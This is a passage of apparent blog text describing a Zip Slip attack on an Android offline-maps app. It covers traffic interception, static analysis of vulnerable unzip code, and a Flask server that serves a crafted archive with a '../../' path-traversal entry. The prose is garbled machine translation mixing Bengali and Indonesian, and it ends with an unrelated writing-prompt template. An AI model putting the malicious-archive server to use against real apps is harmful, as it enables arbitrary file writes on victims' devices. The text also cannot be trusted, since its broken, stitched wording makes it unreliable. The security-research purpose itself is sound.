ZIP SLIP দুর্বলতা কি? জিপ স্লিপ একটি গুরুতর দুর্বলতা যা আর্কাইভ নিষ্কাশন প্রক্রিয়ায় ব্যাপক, আক্রমণকারীদের সিস্টেমে যেকোনো ফাইল লিখতে দেয়। সাধারণত, এর ফলে হয়। 5 জুন, 2018-এ প্রকাশের আগে Snyk সিকিউরিটি টিম দ্বারা দুর্বলতাটি আবিষ্কৃত এবং দায়িত্বের সাথে প্রকাশ করা হয়েছিল৷ সমস্যাটি HP, Amazon, Apache, Pivotal এবং আরও অনেকের মতো বড় কোম্পানিগুলির মালিকানাধীন সহ হাজার হাজার প্রকল্পকে প্রভাবিত করে৷ RCE (রিমোট কোড এক্সিকিউশন) জিপ স্লিপকে বিশেষভাবে তৈরি করা আর্কাইভের মাধ্যমে ব্যবহার করা হয় ফাইলের নামের সাথে যাতে ডিরেক্টরি ট্রাভার্সাল অন্তর্ভুক্ত থাকে। এই দুর্বলতা অনেক আর্কাইভ ফরম্যাটে ঘটতে পারে, যেমন tar, ghz, jar, war, cpio, apk, rar, এবং 7z। (eg, ../../evil.sh) এই দুর্বলতার মূল হল ডিরেক্টরি ট্রাভার্সাল, যেখানে একজন আক্রমণকারী লক্ষ্য ফোল্ডারের বাইরে সিস্টেম ফাইলগুলির অংশগুলি অ্যাক্সেস করতে পারে। আক্রমণকারী তখন এক্সিকিউটেবল ফাইলটিকে ওভাররাইড করতে পারে এবং এটিকে দূরবর্তীভাবে চালাতে পারে, অথবা সিস্টেম বা ব্যবহারকারীর ফাইলটি কল করার জন্য অপেক্ষা করতে পারে, যাতে তারা শিকারের মেশিনে কমান্ড চালাতে পারে। এছাড়াও, এই দুর্বলতা কনফিগারেশন ফাইল বা অন্যান্য সংবেদনশীল সংস্থানগুলি ওভাররাইট করে ক্ষতির কারণ হতে পারে এবং ব্যবহারকারীর মেশিন এবং সার্ভারে উভয়ই শোষিত হতে পারে। কীভাবে জিপ স্লিপ ব্যবহার করবেন জিপ স্লিপ দূর্বলতা ব্যবহার করার জন্য কল করুন এই অ্যান্ড্রয়েডের জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করার জন্য ব্যবহার করা যেতে পারে। Google Maps-এর জন্য অ্যাপলিকেশনের জন্য বেছে নেওয়া হয়েছে স্থানীয় মানচিত্রগুলি ডাউনলোড করার জন্য রিসোর্স বাটনে ক্লিক করুন ডি লেয়ার। + Tetapi sebelum kita analysis Flow dari cara kerja apk ini kita harus memakai apk Burpsuite. Untuk yang belum tau apk Burpsuite adalah applikasi yang digunakan untuk menguji kemanan applicasi web dan mobile. আলত ini berfungsi untuk . mendeteksi kerentanan, menganalisis, dan mengatasi masalah kemanan আপনি এই লিঙ্কে ক্লিক করার জন্য টুল ডাউনলোড করতে পারেন: https://portswigger.net/burp/communitydownload Berikut adalah hasil intercept ketika kita mau menambahkan maps nya, dan bisa di analysis kalau apk ini rentan karena permintaan API nya masih memakai protocol HTTP টিডাক মেঙ্গগুনাকান HTTPS yang dimana memungkinkan অ্যাটাকার ট্রাফিক ট্রাফিকের জন্য তারপরে,তাপী জুগ ম্যানিপুলেট/মেমোডিফিকেশনের অনুরোধ এবং সাড়া ক্লিয়ারটেক্সট Dan Fakta nya bahwa ketika masih memakai HTTP dapat membuka seluruh এলাকায় permukaan serangan, Contohnya jenis serangan yang sedang kita buat ini. Bisa dilihat juga menggunakan untuk melakukan reverse Engineering yang dimana kita bisa melakukan static analysis pada sebuah aplikasi memungkinkan penyerang untuk memahami struktur dan logika aplikasi. Tools JADX এপ্লিকেশন ফাইলের বিশ্লেষণের জন্য সেট করুন । Sehingga konfigurasi ini mengizinkan clear text ট্রাফিক di setiap permintaan untuk domain yang diizinkan. টেটাপি অ্যাপাক ডোমেন ini benar-benar digunakan untuk CleartextTraffic tersebut. Bisa saja ini dibuat hanya untuk pengujian / tidak digunakan dalam production. network_security_config.xml cleartextTrafficPermitted="true" ini adalah Hasil intercept ketika kita mendownload মানচিত্র nya yang dimana dia mengambil file ZIP dengan format .ghz ড্যান মেনকোবা ফাইল ডাউনলোড করুন .GHz সেকার ম্যানুয়াল ডেনগান কপাস ডি ল্যাপটপ। জিপ টারসেবুট আইএসআই ফাইল তৈরি করুন। Untuk mengetahui lokasi data yang di unzip oleh aplikasi kita bisa gunakan কমান্ড di adb শেল মোবাইল এমুলেটর nya dan pastikan juga kalau kita sudah memiliki akses root di emulatornya. find / | grep australia oceania_nauru.map Bisa dilihat kalau path file yang di unzip ada di : /data/media/0/Android/data/io.hextree.pocketmaps/files/Download/pocketmaps/maps/ Ini juga menunjukkan Kepada kita bahwa aplikasi benar-benar meng-unzip ফাইল ম্যাপ nya. দুর্বলতা বিশ্লেষণ পর্যায় আমার কিতা লিখতে লিখতে লিখতে হবে সালিসী ফাইলের জন্য দুর্বলতা ডালম অ্যাপলিকেশন, সেপারটি ইয়াং সুডাহ কিতা কেতাহুই ইস্যু এবং জিপ ম্যাপ হ্যান্ডলিং ফাইল করার জন্য। স্থির বিশ্লেষণের জন্য আপনার কীওয়ার্ড: এবং মেনগেটাহুই ক্লাস কোড কোন মেং-হ্যান্ডেল ফাইল জিপ মানচিত্র. ZipEntry Sebelum kita বিশ্লেষণ লেবিহ ডালাম কোড nya, Saa akan mengikuti panduan dari snyk team untuk mencari kode yang sering diimplementasi tetapi rentan. বেরিকুত আদালাহ সালাহ সাতু পান্ডুয়ান ইয়াং খুসুস অন্টুক বাহাসা জাভা, বিসা বাকা লেবিহ লানজুত: https://github.com/snyk/zip-slip-vulnerability পেঞ্জেলাসন: কোড বেরিকুট ভাড়া তেরহাদপ সেরাঙ্গন টিডাক মেলাকুকান বৈধতাসি ইয়াং মেমাদাই তেরহাদপ জালুর ফাইল ডালাম আরসিপ জিপ সেবেলাম মেঙ্গেকস্ট্রাকনিয়া। sini, ফাইলের নাম ফাইলের সাথে সম্পর্কিত জালুর রিলাটিফ ইয়াং বারবাহায়া, সেপারটি . Ii berarti file tersebut bisa diekstrak di luar yang ditentukan. জিপ স্লিপ কারেন e.getName() ../../malicious.sh destinationDir InputStream input = zip.getInputStream(e); IOUtils.copy(input, write(f)); সেটেলাহ ফাইল ডিবুআট, কনটেন ফাইল ল্যাংসুং ডিসালিন ট্যানপা মেমেরিকসা জালুর কেলুরান আপাকাহ সুদাহ আমান আতউ টিডাক। Jika jalur tersebut menuju ke lokasi berbahaya, seperti direktori root system atau ফোল্ডার lain yang seharusnya tidak dapat diakses oleh aplikasi, itu bisa Sangat Berbahaya. Karena kita sudah mengetahui kode yang rentan sesuai panduan mari kita analysis code di apk nya: পেম্বুতান পথ তানপা ভ্যালিদাসিঃ String str3 = file.getAbsolutePath() + File.separator + nextEntry.getName(); আপনি, জলের ফাইল ( ) ডাইরেক্টরির জন্য আপনার পথ নির্দেশ করতে পারেন ( ) নাম এন্ট্রি জিপ ( )। নামুন, bisa berisi elemen path berbahaya seperti , yang dapat menyebabkan file diekstrak di luar direktori yang dimaksud ( )। str3 file.getAbsolutePath() nextEntry.getName() nextEntry.getName() ../../ file Setelah path dibuat, ফাইল বা ডাইরেক্টরি ডিবুট ল্যাংসুং: if (nextEntry.isDirectory()) { new File(str3).mkdir(); } else { e(zipInputStream, str3, eVar, "" + i3 + " Unzipping " + str2, size, null); } ইনি মেমবুট বা মেনুলিস ফাইল টানপা মেমাস্তিকান বাহওয়া অ্যাডলাহ জলুর ইয়াং আমান। str3 শোষণ পর্যায় অটুক দি তাহাপ ইনি সায়া menyiapkan 2 hal untuk পরিবেশ সেরাঙ্গন nya: : এক্সটেনশন HTTP মক ড্যারি burpsuite ini dapat mengubah সাড়া জারি করে এপ্লিকেশন করার নিয়ম মেনকোকোকন নিয়মগুলি এবং । আপনি আপনাকে নির্দেশ করতে পারেন যে আপনার উত্তরের জন্য আপনাকে URL-এ পুনঃনির্দেশ করতে হবে, HTTP উপহাসের জন্য রিয়েল টাইম ব্যবহার করতে হবে। ডায়নামিক HTTP মকিং এনভায়রনমেন্ট সেটআপ করুন http history input manual 2. : কারেন সেটআপ অনুরোধটি আপনার কাছে আপনার স্থানীয় সার্ভারকে দূষিত পুনঃনির্দেশ করতে পারে এবং দূষিত জিপ করতে পারে না: স্থানীয় সার্ভার এনভায়রনমেন্ট সেট-আপ করুন from flask import Flask, jsonify, send_file import zipfile, io app = Flask(__name__) @app.route('/map.json') def map_json(): response = { "maps-0.13.0_0-path": "maps", "maps-0.13.0_0": [ {"name": "maliciousmaps_USA", "size": "300k", "time": "2025-01"}, ] } return jsonify(response) @app.route('/map.ghz') def map_archive(): # Create a ZipFile object zip_buffer = io.BytesIO() filename = "../../downloads/hax" with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: content = "You have been hacked" zip_file.writestr(filename, content) zip_buffer.seek(0) return send_file( zip_buffer, mimetype='application/zip', as_attachment=True, download_name='map.ghz' ) if __name__ == '__main__': app.run(debug=True, port=1234) আপনি কিভাবে সাইবার সিকিউরিটিতে এলেন? কেন আপনি ডিজিটাল নিরাপত্তা একটি কর্তৃপক্ষ? এই স্থান আপনার দক্ষতা কি? সাইবার ক্রাইম ক্রমাগত বিকশিত হচ্ছে। সাইবার ক্রাইমের জগতে নতুন কী আছে যা হ্যাকারনুন সম্প্রদায় ডিজিটাল প্রতারকদের বিরুদ্ধে লড়াইয়ে জানতে পারে? কোন উদীয়মান সাইবারসিকিউরিটি প্রবণতা বা হুমকি আছে যা পাঠকদের সন্ধান করা উচিত? ট্রোজান, ম্যালওয়্যার, স্পাইওয়্যার এবং আরও অনেক কিছু। আমাদের প্রিয় পিসিগুলিকে সংক্রামিত করতে এবং আমাদের তথ্য গ্রহণ করতে পারে এমন সাম্প্রতিক বাগগুলির স্কুপ কী? এটা সেখানে থামে না, যদিও; আমাদের জানা যাক অন্যান্য সাইবার কুফল কি আছে! আপনি কীভাবে অনলাইনে নিজেকে নিরাপদ রাখবেন? আপনি কীভাবে দুর্বলতার সাথে নতুন প্রযুক্তি নেভিগেট করছেন? স্মার্ট হোমস, এআই, এবং ইন্টারনেট অফ থিংস এর দুর্বলতা রয়েছে। অতিরিক্ত চিন্তা উপসংহার আপনার খসড়া লেখা এবং জমা দেওয়ার আগে দয়া করে উপরের সমস্ত তথ্য মুছে ফেলার বিষয়টি নিশ্চিত করুন৷ ধন্যবাদ!
